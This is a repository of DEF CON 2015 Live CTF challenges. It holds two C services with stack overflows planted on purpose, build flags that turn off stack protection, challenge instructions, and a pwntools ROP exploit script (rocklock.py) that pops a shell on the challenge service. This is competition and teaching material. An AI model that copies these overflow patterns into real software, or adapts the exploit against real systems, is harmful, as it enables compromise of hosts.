├── .gitignore ├── LICENSE ├── README.md ├── hearye ├── Makefile ├── flag ├── hearye ├── hearye.c ├── hearye.zip ├── hearye.zip.gpg ├── instructions.txt ├── pwn-execstack ├── pwn-strtol └── shellcode.s └── rocklock ├── gen-zip.sh ├── rocklock ├── rocklock.c ├── rocklock.py ├── rocklock1 ├── rocklock2 ├── rocklock3 ├── rocklock4 ├── team1.zip ├── team2.zip ├── team3.zip └── team4.zip /.gitignore: -------------------------------------------------------------------------------- 1 | livectf.zip 2 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2015 VECTOR 35 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # defcon2015-livectf 2 | Challenges from the DEF CON 2015 Finals Live CTF 3 | 4 | Note that the "execstack" payload only worked on qemu-user not native hardware because of hardware enforced DEP. Left anyway just because. 5 | -------------------------------------------------------------------------------- /hearye/Makefile: -------------------------------------------------------------------------------- 1 | hearye: hearye.c 2 | #gcc -o hellomake hellomake.c hellofunc.c -I. 3 | aarch64-linux-gnu-gcc -z execstack -fno-stack-protector -static -g -O0 -o hearye hearye.c 4 | zip hearye.zip instructions.txt hearye 5 | 6 | clean: 7 | rm -f hearye *.i64 *.zip 8 | -------------------------------------------------------------------------------- /hearye/flag: -------------------------------------------------------------------------------- 1 | flag{YouMayNotHaveROPedYetButYouWillNextTime} 2 | -------------------------------------------------------------------------------- /hearye/hearye: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/hearye/hearye -------------------------------------------------------------------------------- /hearye/hearye.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title: HearYe 3 | Author: Jordan Wiens 4 | Description: Dumb service meant for very fast exploitation. 5 | */ 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | #define CLEAR "\033[2J\033[1;1H" 14 | #define WELCOME "Hear Ye, Hear Ye, The Ye Old Town Crier Service\n" 15 | 16 | int pwnable = 31337; 17 | 18 | void anykey() 19 | { 20 | printf("\nPress Any Key to Continue\n"); 21 | fflush(stdout); 22 | getchar(); 23 | } 24 | 25 | int system(char* cmd) 26 | { 27 | char* argv[4]; 28 | argv[0] = "/system/bin/sh"; 29 | argv[1] = "-c"; 30 | argv[2] = cmd; 31 | argv[3] = NULL; 32 | 33 | pid_t pid = fork(); 34 | if (pid == 0) 35 | { 36 | execve(argv[0], argv, __environ); 37 | argv[0] = "/bin/sh"; 38 | execve(argv[0], argv, __environ); 39 | _exit(-1); 40 | } 41 | 42 | int status; 43 | waitpid(pid, &status, 0); 44 | return status; 45 | } 46 | 47 | long choice() 48 | { 49 | char buffer[64]; 50 | fflush(stdout); 51 | fgets(buffer, 128, stdin); 52 | return atol(buffer); 53 | } 54 | 55 | unsigned int menu() 56 | { 57 | printf(CLEAR WELCOME); 58 | printf("1) Cry Havok\n2) Set my name\n3) Cry my name\n4) Pwn\n\n0) Quit\n\nCHOICE: "); 59 | return choice(); 60 | } 61 | 62 | char* setname() 63 | { 64 | static char criername[128]; 65 | printf("Well met, my liege. Please let us know how to identify you: "); 66 | fflush(stdout); 67 | fgets(criername,128,stdin); 68 | strtok(criername,"\n"); 69 | return criername; 70 | } 71 | 72 | void cry() 73 | { 74 | printf("Blood and destruction shall be so in use \nAnd dreadful objects so familiar \nThat mothers shall but smile when they behold \nTheir infants quarter\'d with the hands of war; \nAll pity choked with custom of fell deeds: \nAnd Caesar\'s spirit, ranging for revenge, \nWith Ate by his side come hot from hell, \nShall in these confines with a monarch\'s voice \nCry \'Havoc,\' and let slip the dogs of war; \nThat this foul deed shall smell above the earth \nWith carrion men, groaning for burial.\n\n"); 75 | anykey(); 76 | } 77 | 78 | void cryname(char *name) 79 | { 80 | printf("Hear Ye, Hear Ye! All ye Kings and Queens, Knights and Nobles, Peasants and\nPwners. Bask in the glory that is %s and their skills are legion. Cower, and be a feared.",name); 81 | anykey(); 82 | } 83 | 84 | void pwn() 85 | { 86 | printf("Sorry, it's not that easy...\n"); 87 | if (pwnable==35) 88 | { 89 | system("cat this-is-not-the-flag"); 90 | } 91 | anykey(); 92 | } 93 | 94 | 95 | int main(int argc, char* argv[]) 96 | { 97 | unsigned int choice=35; 98 | char name[128]; 99 | 100 | do { 101 | choice = menu(); 102 | switch (choice) 103 | { 104 | case 1: 105 | cry(); 106 | break; 107 | case 2: 108 | bzero(name,128); 109 | memcpy(name,setname(),128); 110 | break; 111 | case 3: 112 | cryname(name); 113 | break; 114 | case 4: 115 | pwn(); 116 | break; 117 | } 118 | 119 | } while (choice != 0); 120 | 121 | printf("\nGoodbye...\n\n"); 122 | 123 | return 0; 124 | } 125 | -------------------------------------------------------------------------------- /hearye/hearye.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/hearye/hearye.zip -------------------------------------------------------------------------------- /hearye/hearye.zip.gpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/hearye/hearye.zip.gpg -------------------------------------------------------------------------------- /hearye/instructions.txt: -------------------------------------------------------------------------------- 1 | This challenge is a stand alone challenge, and should be completed as quickly as possible. 2 | 3 | The fastest teams will receive extra points. 4 | 5 | There are no SLA checks for this service. Once you have exploited it and submitted the flag, you are done. 6 | 7 | The binary is running on a Nexus 9 running Android 5.1.1. The only changes are that it was rooted. 8 | 9 | IP: 10.5.18.2 10 | PORT: 3535 11 | 12 | The flag is in the current working directory. It is called "flag". 13 | 14 | Submit to: 15 | 16 | https://10.3.1.7/livectf/ 17 | 18 | (Replace with the flag from the flag file. If you get json back, it worked) 19 | 20 | Good luck. 21 | -------------------------------------------------------------------------------- /hearye/pwn-execstack: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/hearye/pwn-execstack -------------------------------------------------------------------------------- /hearye/pwn-strtol: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/hearye/pwn-strtol -------------------------------------------------------------------------------- /hearye/shellcode.s: -------------------------------------------------------------------------------- 1 | .section .text, "ax" 2 | .global _start 3 | _start: 4 | nop 5 | mov x0,#0x490000 6 | add x0, x0, #0x4000 7 | add x0,x0,#0xA58 8 | nop 9 | #mov x0, #0x490000 10 | #mov x1, #0x4A00 11 | #add x0, x1, x0 12 | #add x0, x1, #0x58 13 | 14 | mov x1, #0x400000 15 | add x1, x1, #0xea8 16 | br x1 17 | -------------------------------------------------------------------------------- /rocklock/gen-zip.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | for team in 1 2 3 4 3 | do 4 | case $team in 5 | 1) 6 | password="letmein181" 7 | ;; 8 | 2) 9 | password="letmein244" 10 | ;; 11 | 3) 12 | password="letmein364" 13 | ;; 14 | 4) 15 | password="letmein474" 16 | ;; 17 | esac 18 | echo "Same Nexus 9 running Android 5.1.1. 19 | 20 | IP: 10.5.18.2 21 | PORT: 500$team 22 | 23 | THERE IS NO FLAG -- execute './win' to show you've won. 24 | 25 | Good luck." > instructions-team$team.txt 26 | rm team$team.zip 27 | zip team$team.zip instructions-team$team.txt rocklock$team 28 | rm instructions-team$team.txt 29 | done 30 | -------------------------------------------------------------------------------- /rocklock/rocklock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/rocklock -------------------------------------------------------------------------------- /rocklock/rocklock.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | static bool locked = true; 7 | static char greeting[1024] = "Enter your authentication code to access this facility."; 8 | 9 | int system(char* cmd) 10 | { 11 | char* argv[4]; 12 | argv[0] = "/system/bin/sh"; 13 | argv[1] = "-c"; 14 | argv[2] = cmd; 15 | argv[3] = NULL; 16 | 17 | pid_t pid = fork(); 18 | if (pid == 0) 19 | { 20 | execve(argv[0], argv, __environ); 21 | argv[0] = "/bin/sh"; 22 | execve(argv[0], argv, __environ); 23 | _exit(-1); 24 | } 25 | 26 | int status; 27 | waitpid(pid, &status, 0); 28 | return status; 29 | } 30 | 31 | void check_lock_status() 32 | { 33 | if (locked) 34 | printf("Device is LOCKED\n"); 35 | else 36 | printf("Device is UNLOCKED\n"); 37 | } 38 | 39 | void set_lock_status() 40 | { 41 | printf("This feature is disabled by administrative policy. This setting\n"); 42 | printf("can be modified using the physical link interface.\n"); 43 | } 44 | 45 | void change_greeting(char* buf) 46 | { 47 | char data[1024]; 48 | printf("New greeting: "); 49 | if (!fgets(data, 1023, stdin)) 50 | _exit(1); 51 | 52 | size_t len = strlen(data); 53 | if ((len > 0) && (data[len - 1] == '\n')) 54 | data[len - 1] = 0; 55 | 56 | strcpy(buf, data); 57 | } 58 | 59 | void display_greeting() 60 | { 61 | printf("Current greeting: %s\n", greeting); 62 | } 63 | 64 | void menu() 65 | { 66 | char buf[256]; 67 | while (true) 68 | { 69 | printf("\nMenu:\n"); 70 | printf("1) Check lock status\n"); 71 | printf("2) Set lock status (DISABLED by policy)\n"); 72 | printf("3) Change greeting\n"); 73 | printf("4) Display greeting\n"); 74 | printf("5) Exit\n\n"); 75 | printf("Choose an option: "); 76 | fflush(stdout); 77 | 78 | char opt[32]; 79 | if (!fgets(opt, 31, stdin)) 80 | _exit(1); 81 | int choice = atoi(opt); 82 | if ((choice < 1) || (choice > 5)) 83 | continue; 84 | 85 | printf("\n"); 86 | 87 | if (choice == 1) 88 | { 89 | check_lock_status(); 90 | } 91 | else if (choice == 2) 92 | { 93 | set_lock_status(); 94 | } 95 | else if (choice == 3) 96 | { 97 | change_greeting(buf); 98 | strcpy(greeting, buf); 99 | } 100 | else if (choice == 4) 101 | { 102 | display_greeting(); 103 | } 104 | else if (choice == 5) 105 | { 106 | break; 107 | } 108 | } 109 | } 110 | 111 | int main() 112 | { 113 | int i; 114 | printf("Rock Lock RLK8239 Wireless Management Interface\n"); 115 | system("date"); 116 | printf("\nPassword: "); 117 | fflush(stdout); 118 | 119 | char pwd[256]; 120 | if (!fgets(pwd, 255, stdin)) 121 | _exit(1); 122 | if (strcmp(pwd, "letmeinplz\n") != 0) 123 | return 1; 124 | 125 | menu(); 126 | return 0; 127 | } 128 | 129 | -------------------------------------------------------------------------------- /rocklock/rocklock.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import sys 3 | 4 | team = int(sys.argv[2]) 5 | p = remote(sys.argv[1], 5000 + team) 6 | 7 | greeting = 0x493018 8 | pop_x19 = 0x400790 9 | mov_x0_x19 = 0x400788 10 | system = 0x400e38 11 | fill = 0x4141414141414141 12 | 13 | if team == 0: 14 | p.send("letmeinplz\n") 15 | elif team == 1: 16 | p.send("letmein181\n") 17 | elif team == 2: 18 | p.send("letmein244\n") 19 | elif team == 3: 20 | p.send("letmein364\n") 21 | elif team == 4: 22 | p.send("letmein474\n") 23 | 24 | rop = p64(pop_x19) + "A"*0x100 25 | rop += p64(fill) + p64(mov_x0_x19) + p64(greeting) + p64(fill) + p64(fill) + p64(fill) + p64(fill) + "A"*0x68 26 | rop += p64(fill) + p64(system) 27 | 28 | cmd = "sh\x00" 29 | payload = cmd + "A" * (0x110 - len(cmd)) + rop 30 | 31 | while len(payload) > 0: 32 | p.send("3\n") 33 | p.send(payload.replace('\x00', 'A') + "\n") 34 | zero = payload.rfind('\x00') 35 | if zero == -1: 36 | break 37 | payload = payload[0:zero] 38 | 39 | p.send("5\n") 40 | 41 | p.interactive() 42 | 43 | -------------------------------------------------------------------------------- /rocklock/rocklock1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/rocklock1 -------------------------------------------------------------------------------- /rocklock/rocklock2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/rocklock2 -------------------------------------------------------------------------------- /rocklock/rocklock3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/rocklock3 -------------------------------------------------------------------------------- /rocklock/rocklock4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/rocklock4 -------------------------------------------------------------------------------- /rocklock/team1.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/team1.zip -------------------------------------------------------------------------------- /rocklock/team2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/team2.zip -------------------------------------------------------------------------------- /rocklock/team3.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/team3.zip -------------------------------------------------------------------------------- /rocklock/team4.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vector35/defcon2015-livectf/a4a5c57c9f34166b71b1823b0846415e4142600a/rocklock/team4.zip --------------------------------------------------------------------------------